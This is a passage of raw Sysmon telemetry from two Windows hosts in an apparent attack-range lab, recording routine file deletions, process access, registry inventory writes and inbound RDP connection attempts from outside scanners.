Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA99CC6FBC07A4782D1C0248496AF1CA,SHA256=A4A79BE9143536C0120D3279F5D046C3CAFC2C74844A239CD751E10AA7B39D82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073198Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:38.578{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\Y4IA8CF0NY\System.ServiceProcess.ni.dll.auxMD5=29E6A003183458CCF64AB3D7FD5E09A9,SHA256=60A7576757C609BEA9AC9B80C89C840C25628B230A49E43AE3297DC76FAF7D81,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000073197Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:38.578{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EBA6-607E-A60B-00000000BB01}6568C:\Windows\system32\compattelrunner.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000073196Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:38.578{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\Y4IA8CF0NY\System.ServiceProcess.ni.dllMD5=04E405537AA94EDFF3323F0467D26778,SHA256=68136A857028E1F557F9FBB105346CC072FF372608AB0F448A7BA6AEE555D34F,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073195Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:38.562{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\XVFFVWAZ7P\System.Data.ni.dll.auxMD5=1048C0ED575A23FCAAD4A2A3D4AB051D,SHA256=4BF180857736CBED625371F3063FB75AFDCEA6BB064FB787B1CE79717F5B522C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073194Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:38.562{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\XVFFVWAZ7P\System.Data.ni.dllMD5=97B08C7C842385FA82BB242375C02597,SHA256=12EDACC3503A34EE8F82B27C2E63D46FEE7F5C01CC2D8838A5ECD39FC615074D,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000073193Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:38.312{A7A01FEF-EBA6-607E-A70B-00000000BB01}15803480C:\Windows\system32\conhost.exe{A7A01FEF-EBA6-607E-A60B-00000000BB01}6568C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073192Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:38.297{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBA6-607E-A70B-00000000BB01}1580C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073191Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:38.297{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBA6-607E-A60B-00000000BB01}6568C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073190Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:38.297{A7A01FEF-B626-607E-1300-00000000BB01}12642404C:\Windows\System32\svchost.exe{A7A01FEF-EBA6-607E-A60B-00000000BB01}6568C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\pcasvc.dll+43591|c:\windows\system32\pcasvc.dll+22bed|C:\Windows\SYSTEM32\ntdll.dll+7de1d|C:\Windows\SYSTEM32\ntdll.dll+3a969|C:\Windows\SYSTEM32\ntdll.dll+1e86f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000073189Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:38.250{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\XGTN4JOG04\System.Configuration.Install.ni.dll.auxMD5=08DAC8470A6071A6F9D300CCECE11FDC,SHA256=F21F4F9BD5BEBE704971BBC058A01C007211FABC2BF86E2BDFF504394E89A5F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073188Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:38.250{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\XGTN4JOG04\System.Configuration.Install.ni.dllMD5=6CEF29BBBE3A64E8EDA58C8614B58316,SHA256=D6B4C973DAA83DB08F6D1013643F3A287BE92A3DF7629A06421EA2370B126C58,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073187Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:38.250{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\XFM9ITHJMN\System.ni.dll.auxMD5=F974195E5ECE86B40F7C98CEAFF80650,SHA256=6FED5EE609434200BCCA2E954E4FF45678A458F016A429BD3AD7BE480AC33845,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073186Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:38.250{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\XFM9ITHJMN\System.ni.dllMD5=13DE7F98F0CB9EB352C90FC60D125E6B,SHA256=895BF50B6C923C70F9F96ED6117D4F5929607376E5F00531F7E0E9209D4A1028,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000050047Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:36.652{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com53330-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050046Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:38.406{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F3AC45E33044B01E7E88C811B9985E4,SHA256=E2C5D0E8F99F4ACE607C0254429DE348ECCD6F0C61AFA69080282C25BACD9309,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000073228Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:38.084{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57522-false10.0.1.12-8000- 23542300x800000000000000073227Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:39.625{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46B9204F542EE12EF55AD07EF2FF4064,SHA256=4E2F2BD6EE1547B83BD5C33A424A926619DDBEAC7A2200DF60FF299B7B8E1A5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073226Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:39.609{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\PublisherPolicy.tmeMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000073225Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:56:39.437{A7A01FEF-EBA6-607E-A60B-00000000BB01}6568C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{99b77cad-d006-dc01-2de1-804b70567946}\Root\InventoryApplicationFile\vstoinstaller.ex|c0ef73c374d5c127\BinProductVersion10.0.60828.0 13241300x800000000000000073224Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:56:39.437{A7A01FEF-EBA6-607E-A60B-00000000BB01}6568C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{99b77cad-d006-dc01-2de1-804b70567946}\Root\InventoryApplicationFile\vstoinstaller.ex|c0ef73c374d5c127\LinkDate12/22/2017 05:08:07 13241300x800000000000000073223Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:56:39.437{A7A01FEF-EBA6-607E-A60B-00000000BB01}6568C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{99b77cad-d006-dc01-2de1-804b70567946}\Root\InventoryApplicationFile\vstoinstaller.ex|c0ef73c374d5c127\Publishermicrosoft corporation 13241300x800000000000000073222Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:56:39.437{A7A01FEF-EBA6-607E-A60B-00000000BB01}6568C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{99b77cad-d006-dc01-2de1-804b70567946}\Root\InventoryApplicationFile\vstoinstaller.ex|c0ef73c374d5c127\LowerCaseLongPathc:\program files\common files\microsoft shared\vsto\10.0\vstoinstaller.exe 13241300x800000000000000073221Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:56:39.437{A7A01FEF-EBA6-607E-A60B-00000000BB01}6568C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{99b77cad-d006-dc01-2de1-804b70567946}\Root\InventoryApplicationFile\vstoinstaller.ex|4af637e234df85fb\BinProductVersion10.0.60828.0 13241300x800000000000000073220Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:56:39.437{A7A01FEF-EBA6-607E-A60B-00000000BB01}6568C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{99b77cad-d006-dc01-2de1-804b70567946}\Root\InventoryApplicationFile\vstoinstaller.ex|4af637e234df85fb\LinkDate12/22/2017 05:12:25 13241300x800000000000000073219Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:56:39.437{A7A01FEF-EBA6-607E-A60B-00000000BB01}6568C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{99b77cad-d006-dc01-2de1-804b70567946}\Root\InventoryApplicationFile\vstoinstaller.ex|4af637e234df85fb\Publishermicrosoft corporation 13241300x800000000000000073218Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:56:39.437{A7A01FEF-EBA6-607E-A60B-00000000BB01}6568C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{99b77cad-d006-dc01-2de1-804b70567946}\Root\InventoryApplicationFile\vstoinstaller.ex|4af637e234df85fb\LowerCaseLongPathc:\program files (x86)\common files\microsoft shared\vsto\10.0\vstoinstaller.exe 13241300x800000000000000073217Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:56:39.437{A7A01FEF-EBA6-607E-A60B-00000000BB01}6568C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{99b77cad-d006-dc01-2de1-804b70567946}\Root\InventoryApplication\00001feb129e42f002106264e6dd8e24b68a00000000\PublisherMicrosoft Corporation 23542300x800000000000000073216Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:39.203{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4504DDE4354247A02241980C450CA5E7,SHA256=86E030B023566B1FA3CCEA568F4E97BB175D4D5B74D8BE63C581325ABB449374,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073215Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:39.015{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\ZZT9OSN8RI\System.Transactions.ni.dll.auxMD5=999D14BCEA16BC6927359881D4D39D58,SHA256=E951F9BEEAFE791DF0F3CB3AFE9BD07BDE358EE20E01DC5F2018DDDB466EEC96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073214Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:39.015{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\ZZT9OSN8RI\System.Transactions.ni.dllMD5=069D6E12D3CAB923FD4E8AC75EE89BA1,SHA256=F4957C4BFCF882B16615546FCA8A910B09508E5520C62914203915BA51DC3DF1,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073213Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:39.000{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\ZXIE4TWQX1\System.Numerics.ni.dll.auxMD5=03FB751D7366F1FADBD9267BF1C0D693,SHA256=5F68B3516C69DF888F1ACC44B0A716CE8E63DB995BEC4E8DB170237BC10908AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073212Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:39.000{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\ZXIE4TWQX1\System.Numerics.ni.dllMD5=282F0EF6FEB85C1AA8A4D5EAED7B0345,SHA256=9999B5F5E7F6A025582ABB469F2B898514033BC187344B9CA7E507DAE28CB542,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073211Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:39.000{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\ZXC84VB1B5\System.Transactions.ni.dll.auxMD5=799D1D6903AEF7B551CD4A4C6B265AA9,SHA256=EAE828D0DC70B8C0CADC0F2FB1EB4DAB7A5E36C371C4B8A27C807DE7C0974339,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073210Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:39.000{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\ZXC84VB1B5\System.Transactions.ni.dllMD5=8D18FAAB7987602078CF848438C95F88,SHA256=AB760B68DE4E3D55C85FBC48423AC7C47C8A8C34FC3964E0473DA960D0BC3C5D,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000050050Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:37.009{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-62773-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050049Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:39.437{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=691A1275D5F441E72B2B8774F355376A,SHA256=383548E1352DC5301DBB8785D227D8808B35013D418BCAF63E402D7ED06564EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050048Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:39.062{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1F54EE600CD6865F897E56D7C7194D39,SHA256=30F7F6430DDBC0179C605AEC6B3D3239466FA720B37470A4EFE5081D532A507B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073233Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:40.953{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\PublisherPolicy.tmeMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073232Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:40.734{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=686BB3770C6F37210F017EE6FE10FDF7,SHA256=4D831737FF11271397E4F1B01234BD89EDF62D7F2FE6DFF018F43F3E08FED0C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073231Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:40.250{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C053D0244A492110D829B5F69DC965EA,SHA256=8110EB45310888DCB76696F56F62EAAB0802E99424EE610E928E595D1D030231,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073230Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:40.093{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=5A8D3D96C7786272C80A68B256044E66,SHA256=1CD4D7DF18DDB3572331832899B3AB7276FB749C4F777B79304810134CFE10D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073229Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:40.078{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\PublisherPolicy.tmeMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050054Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:38.764{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52514-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000050053Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:38.603{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-64243-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050052Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:40.448{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=970DA015395E8A63BFFA8B2FA8E5DAA6,SHA256=D09B07E5B7BD3BAD0249A1B00346CB11DFDCF3E1B9153D10A1F944BD45A219D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050051Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:40.073{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3B64F5C52F5E0B1CDDB758FE55472CCF,SHA256=88D75AFFC7C800784651B24535AC37711BE9B9ABBE0765418A88F29345F3EE38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073239Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:41.906{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BA5C9F96F40953867972BA4F19EB1E7,SHA256=D0FD8A444DBB9C5F832DB8B1BD02F967B5FD13EB441F8A6DA73FE8E60EEF9BA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073238Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:41.812{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\PublisherPolicy.tmeMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073237Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:41.390{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\PublisherPolicy.tmeMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073236Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:41.125{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=1EA1E4CE2C047F1142D407F218F12A6A,SHA256=151427043A4C6B03C07D7262017CA1975CE94CD3057177CFF85CBCC9B29A875E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000073235Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:39.190{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com64021-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000073234Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:38.969{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-43778-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000050057Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:40.183{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-49338-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050056Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:41.669{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BAF0F56C94573F35AE0587DED4DD897E,SHA256=03AA21B755B3967C09668426E002E27FE04B8D419E5D92557A6ABA26F7A1512E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050055Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:41.451{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98EB02695F445EF05695C887C10CB983,SHA256=F5F86DFE0F86A78F9815BE4DBDBDBE1942708D4373A196E3F22F0DA34F4D8C63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073244Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:42.906{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F6D2A3E52F7AC5A0DE65437B8C9B160,SHA256=6DA424A9A4D39C2EE6BC940F2ECD5FC354BD1DE1B2B9A5AA477DF91EE92F1EF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073243Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:42.656{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT 